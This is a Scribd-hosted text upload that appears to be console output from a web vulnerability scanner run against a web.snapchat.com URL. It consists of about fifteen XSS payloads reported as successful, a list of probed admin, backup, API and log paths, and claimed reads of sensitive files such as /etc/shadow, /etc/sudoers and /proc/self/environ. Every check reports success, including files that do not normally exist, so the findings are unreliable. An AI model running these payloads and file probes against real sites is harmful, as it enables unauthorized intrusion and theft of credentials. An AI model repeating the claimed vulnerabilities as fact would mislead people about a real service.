0% found this document useful (0 votes)
10 views3 pages

Message

Uploaded by

v21551136
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
10 views3 pages

Message

Uploaded by

v21551136
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

[20:45:51] [>] | Website Url -> https://web.snapchat.

com/87b50add-66ef-49c5-af66-
b2f9bdfba864
[20:46:20] [~] | Looking for a vulnerability..
[20:46:42] [x] | Vulnerability: Sql Status: False
[20:46:42] [+] | Vulnerability: Xss Status: True Error: <link Provocation:
<script>alert('XssFoundByRedTiger')</script>
[20:46:42] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <img
src=x onerror=alert('XssFoundByRedTiger')>
[20:46:43] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <body
onload=alert('XssFoundByRedTiger')>
[20:46:43] [+] | Vulnerability: Xss Status: True Error: <link Provocation:
<svg/onload=alert('XssFoundByRedTiger')>
[20:46:44] [+] | Vulnerability: Xss Status: True Error: <link Provocation:
javascript:alert('XssFoundByRedTiger')
[20:46:44] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <iframe
src='javascript:alert("XssFoundByRedTiger")'></iframe>
[20:46:45] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <input
type="text" onfocus="alert('XssFoundByRedTiger')">
[20:46:45] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <link
rel="stylesheet" href="javascript:alert('XssFoundByRedTiger');">
[20:46:45] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <a
href="javascript:alert('XssFoundByRedTiger')">Click me</a>
[20:46:46] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <form
action="javascript:alert('XssFoundByRedTiger')"><input type=submit>
[20:46:46] [+] | Vulnerability: Xss Status: True Error: <link Provocation:
'"><script>alert('XssFoundByRedTiger')</script>
[20:46:47] [+] | Vulnerability: Xss Status: True Error: <link Provocation: '><img
src=x onerror=alert('XssFoundByRedTiger')>
[20:46:47] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <object
data='javascript:alert("XssFoundByRedTiger")'></object>
[20:46:48] [+] | Vulnerability: Xss Status: True Error: <link Provocation: <embed
src='data:text/html,<script>alert("XssFoundByRedTiger")</script>'>
[20:46:48] [+] | Vulnerability: Interesting Path Status: True Path Found: /admin
[20:46:48] [+] | Vulnerability: Interesting Path Status: True Path Found: /admin/
[20:46:50] [+] | Vulnerability: Interesting Path Status: True Path Found: /backup
[20:46:50] [+] | Vulnerability: Interesting Path Status: True Path Found: /backup/
[20:46:52] [+] | Vulnerability: Interesting Path Status: True Path Found: /private
[20:46:53] [+] | Vulnerability: Interesting Path Status: True Path Found: /private/
[20:46:54] [+] | Vulnerability: Interesting Path Status: True Path Found: /uploads
[20:46:55] [+] | Vulnerability: Interesting Path Status: True Path Found: /uploads/
[20:46:56] [+] | Vulnerability: Interesting Path Status: True Path Found: /api
[20:46:57] [+] | Vulnerability: Interesting Path Status: True Path Found: /api/
[20:46:57] [+] | Vulnerability: Interesting Path Status: True Path Found: /api/v1/
[20:46:58] [+] | Vulnerability: Interesting Path Status: True Path Found:
/api/v1/users
[20:46:58] [+] | Vulnerability: Interesting Path Status: True Path Found:
/api/v1/status
[20:46:59] [+] | Vulnerability: Interesting Path Status: True Path Found: /logs
[20:46:59] [+] | Vulnerability: Interesting Path Status: True Path Found: /logs/
[20:47:01] [+] | Vulnerability: Interesting Path Status: True Path Found: /cache
[20:47:02] [+] | Vulnerability: Interesting Path Status: True Path Found: /cache/
[20:47:03] [+] | Vulnerability: Interesting Path Status: True Path Found:
/cache/temp/
[20:47:03] [+] | Vulnerability: Interesting Path Status: True Path Found:
/cache/session/
[20:47:04] [+] | Vulnerability: Interesting Path Status: True Path Found:
/cache/data/
[20:47:05] [+] | Vulnerability: Interesting Path Status: True Path Found: /server-
status
[20:47:05] [+] | Vulnerability: Interesting Path Status: True Path Found: /server-
status
[20:47:06] [+] | Vulnerability: Interesting Path Status: True Path Found: /server-
status/
[20:47:06] [+] | Vulnerability: Interesting Path Status: True Path Found:
/dashboard
[20:47:07] [+] | Vulnerability: Interesting Path Status: True Path Found:
/dashboard/
[20:47:09] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/passwd
[20:47:09] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/password
[20:47:09] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/ip
[20:47:10] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/passwords
[20:47:10] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/ips
[20:47:11] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/shadow
[20:47:11] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/group
[20:47:12] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/hosts
[20:47:12] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/hostname
[20:47:13] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/network/interfaces
[20:47:13] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/sysconfig/network
[20:47:13] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/sysconfig/network-scripts/ifcfg-*
[20:47:14] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/fstab
[20:47:15] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/issue
[20:47:15] [+] | Vulnerability: Sensitive File Status: True File Found: /etc/motd
[20:47:17] [+] | Vulnerability: Sensitive File Status: True File Found:
/etc/sudoers
[20:47:17] [+] | Vulnerability: Sensitive File Status: True File Found: /passwd
[20:47:18] [+] | Vulnerability: Sensitive File Status: True File Found: /password
[20:47:18] [+] | Vulnerability: Sensitive File Status: True File Found: /ip
[20:47:19] [+] | Vulnerability: Sensitive File Status: True File Found: /passwords
[20:47:19] [+] | Vulnerability: Sensitive File Status: True File Found: /ips
[20:47:19] [+] | Vulnerability: Sensitive File Status: True File Found: /shadow
[20:47:20] [+] | Vulnerability: Sensitive File Status: True File Found: /group
[20:47:20] [+] | Vulnerability: Sensitive File Status: True File Found: /hosts
[20:47:21] [+] | Vulnerability: Sensitive File Status: True File Found: /hostname
[20:47:21] [+] | Vulnerability: Sensitive File Status: True File Found:
/network/interfaces
[20:47:22] [+] | Vulnerability: Sensitive File Status: True File Found:
/sysconfig/network
[20:47:22] [+] | Vulnerability: Sensitive File Status: True File Found:
/sysconfig/network-scripts/ifcfg-*
[20:47:23] [+] | Vulnerability: Sensitive File Status: True File Found: /fstab
[20:47:23] [+] | Vulnerability: Sensitive File Status: True File Found: /issue
[20:47:24] [+] | Vulnerability: Sensitive File Status: True File Found: /motd
[20:47:25] [+] | Vulnerability: Sensitive File Status: True File Found: /sudoers
[20:47:26] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/syslog
[20:47:26] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/messages
[20:47:26] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/dmesg
[20:47:27] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/secure
[20:47:27] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/maillog
[20:47:28] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/httpd/access_log
[20:47:28] [+] | Vulnerability: Sensitive File Status: True File Found:
/var/log/httpd/error_log
[20:47:39] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/self/environ
[20:47:39] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/version
[20:47:40] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/cmdline
[20:47:40] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/mounts
[20:47:40] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/net/arp
[20:47:41] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/net/tcp
[20:47:42] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/net/udp
[20:47:42] [+] | Vulnerability: Sensitive File Status: True File Found:
/proc/net/fib_trie

You might also like